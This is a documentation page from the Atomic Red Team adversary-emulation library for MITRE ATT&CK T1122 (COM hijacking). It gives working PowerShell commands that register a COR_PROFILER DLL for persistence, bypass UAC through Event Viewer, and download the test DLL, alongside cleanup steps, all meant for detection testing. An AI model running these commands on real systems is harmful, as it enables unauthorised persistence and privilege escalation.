security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d8ffdf2ee657f317d8a2de6d1790bd92972e075e
atomic-red-team/atomics/T1122/T1122.md
T
CircleCI Atomic Red Team doc generator d9dfeab6c2 Generate docs from job=validate_atomics_generate_docs branch=master
2020-05-06 13:34:18 +00:00

176 lines
8.1 KiB
Markdown
Raw Blame History

# T1122 - Component Object Model Hijacking
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1122)
<blockquote>The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</blockquote>
## Atomic Tests
- [Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER](#atomic-test-1---com-hijack-leveraging-user-scope-cor_profiler)
- [Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER](#atomic-test-2---com-hijack-leveraging-system-scope-cor_profiler)
- [Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER](#atomic-test-3---com-hijack-leveraging-registry-free-process-scope-cor_profiler)
<br/>
## Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
#### Attack Commands: Run with `powershell`!
```powershell
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
```
#### Cleanup Commands:
```powershell
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
```
<br/>
<br/>
## Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Write-Host "Creating system environment variables" -ForegroundColor Cyan
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
```
#### Cleanup Commands:
```powershell
Write-Host "Removing system environment variables" -ForegroundColor Cyan
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
```
<br/>
<br/>
## Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
#### Attack Commands: Run with `powershell`!
```powershell
$env:COR_ENABLE_PROFILING = 1
$env:COR_PROFILER = '#{clsid_guid}'
$env:COR_PROFILER_PATH = '#{file_name}'
POWERSHELL -c 'Start-Sleep 1'
```
#### Cleanup Commands:
```powershell
$env:COR_ENABLE_PROFILING = 0
$env:COR_PROFILER = ''
$env:COR_PROFILER_PATH = ''
```
#### Dependencies: Run with `powershell`!
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
```
<br/>
Reference in New Issue View Git Blame Copy Permalink